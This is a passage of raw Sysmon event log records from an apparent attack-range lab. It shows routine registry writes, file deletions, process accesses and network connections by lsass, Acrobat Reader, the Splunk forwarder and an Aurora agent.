13241300x800000000000000018736Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:30:17.450{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000018735Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:30:17.450{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002771c7) 13241300x800000000000000018734Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:30:17.450{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b30-0x3d67e5aa) 13241300x800000000000000018733Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:30:17.450{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b38-0x9f2c4daa) 13241300x800000000000000018732Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:30:17.450{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b41-0x00f0b5aa) 13241300x800000000000000018731Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:30:17.450{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000018730Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:30:17.450{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002771c7) 13241300x800000000000000018729Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:30:17.450{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b30-0x3d67e5aa) 13241300x800000000000000018728Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:30:17.450{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b38-0x9f2c4daa) 13241300x800000000000000018727Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:30:17.450{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b41-0x00f0b5aa) 23542300x800000000000000018738Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:18.807{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51B4272F4ABFE2A80B184A386D0BF25D,SHA256=009450E41A9A3E82504DF41E5667FAE25663F54A90BB2A744BB4B5A8D4396710,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000047246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:18.625{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journalMD5=1F308EC71532A440F76285DA068F372C,SHA256=4AE1012B647A603310453456A06D1D5C059FF8D1A74A9E0404420735B494C209,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:18.513{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22037A439FF7D1790E1EF63B76FE8BD8,SHA256=B15EE480D1AE7716562B1A11FBA8F61D132711D488BC792150CCBF6850C5919F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:18.480{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018739Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:19.893{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=509363C1E5B6642E008D4090E1E13D4C,SHA256=C9B2690CFA620C0E39573C9DDC709A99BA51366BCBBD25BE867C70352F830D70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000047310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.969{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf8eae3dcaf681ca_0MD5=06573300E4B0455AC5F943149AC26228,SHA256=183E6030B8B8209B1D2C10DA5D21C0E77BC6C979B9BB075398ED7F6BA90EDA1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.969{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4ca3cb58378aaa3f_0MD5=F77622054533C116C3786FD07E4B013E,SHA256=0646A1154ADFBD1977446D7FD7FC0E8E86EF91556878700041E4B2DCB9829405,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.969{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0MD5=D902DE0F873D64D58AE34C6483AEACBE,SHA256=AE209F4D817670C95F42DBA0AF6742C4D146F38097651AA99F740B3267D20A3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.968{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0MD5=9A51BA07C160882CFB42B3B8230D9557,SHA256=141DCD5C622DEB27205C87F491785DF95B762C18E2CA276EB720B50126B66341,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.968{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0MD5=55316220DCF58F67FD267D6DD55C3498,SHA256=3BD82E7F9F893FFBADAF2CDF1244ACD5708DC3A90BFBEFF4A546607AAFB9FF5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.968{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d5dedf551f4d1592_0MD5=97161D22A01E2E7820AD047CD38EDCD5,SHA256=11C6FF104FD8E655101841A360C9AEC69973CD64909064D7C46F56B9FB3FCA17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.968{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\78bff3512887b83d_0MD5=0C068A4F3992A3E06E8869EF96A189D1,SHA256=67CD3652EA1C85ABBC6FF753F275FD5B36D2FB4CA018041A8985C282D2956816,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.968{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0MD5=96590C100BC23A9E4E8261EAB73837C8,SHA256=8FA2819135FE9111B9F7C1CDF0459FFEB0EBABBBBE0D7181CBD6D7EA1755333E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000047302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:18.069{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56481-false72.21.91.29-80http 354300x800000000000000047301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:17.971{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56480-false23.220.206.57a23-220-206-57.deploy.static.akamaitechnologies.com443https 354300x800000000000000047300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:17.970{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56479-false23.220.206.57a23-220-206-57.deploy.static.akamaitechnologies.com443https 354300x800000000000000047299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:17.954{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local50335- 354300x800000000000000047298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:17.951{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56478-false23.78.8.145a23-78-8-145.deploy.static.akamaitechnologies.com443https 354300x800000000000000047297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:17.940{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63296- 354300x800000000000000047296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:17.621{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56477-false10.0.1.12-8000- 23542300x800000000000000047295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.915{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5BD647AB7FE053F0D42CA0AED1CA74E,SHA256=F7A7DEB2984CBC7008EBBC370B21C5701C3D4DCAF10A5F9CD485F9D5D1CA9457,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.906{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0MD5=8C96E41F013C0FFD111BD9948C80F214,SHA256=5C1662749785D84ABDF4908A0BFEB2AA1311254A908738CD92D07FCDD3B1694F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.905{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0MD5=7303EB1C89F9F1355D335583F220B87D,SHA256=0B9F86CAC147641E53CAB566C6B702F65E6506F67B1633763E887F79867BF21C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.905{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0MD5=C174589750F636815659E194F0D374CD,SHA256=088AF264AB72958D8136F46BBD8C96CD078247DB5538D2434C4518A28B6D65F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.904{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0MD5=D08B4F5940BF7DF68DF8767C56028643,SHA256=4FA7EBBDA6BDC51E2BDD805E31737187B0CC1142D978F9FAAE3AF4E98CD423EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.903{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0MD5=D0F227C6F379749114274E251C4B7CAA,SHA256=ECC12421D6FFACB6E01C73695F467DE325BBF48CF8FD28EF1DEE77CD791AB4CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.900{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0MD5=247DB2A507B424685FE5C93BDC1DDC27,SHA256=5B3FA5C8BAD7E84D864C7189779882FB743A72412BDBC4DE6224FF39DB97CECF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.894{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0MD5=D92EE8AECA215446438A7EC7F28AF59D,SHA256=42722816C19231620F2096DDB61A285A824A1B8C0AF254CA2224E1CB53412B67,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.874{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0MD5=F9653E93734CD01CEF2C50BB7B965AC3,SHA256=BB232B74B99A9F9544B9021E707F55DF5497D70BFF7BAECB7AC892B20E634BFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.873{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0MD5=3091155E4CA28AC134BBB3238DEFF462,SHA256=D3422470887630FF3C24A19C243CD90A8FEED6875DABB6F9D231D13DB65469CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.718{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\72d9f526d2e2e7c8_0MD5=57BE915DDE17A7E73B7CB823EB6D3B36,SHA256=AFA3871AF7A006507685ED2334D52F02DCE4547710DE507B003C11D97DD12E21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.479{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.479{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.479{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.478{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.478{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.478{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000047278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.476{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0MD5=E2FDB9CCBEAA8FECACB278C436887480,SHA256=D6F2AA1767B608232286AE72121107D71D9B593720D93DB7F7719EFB91579CD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.406{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files 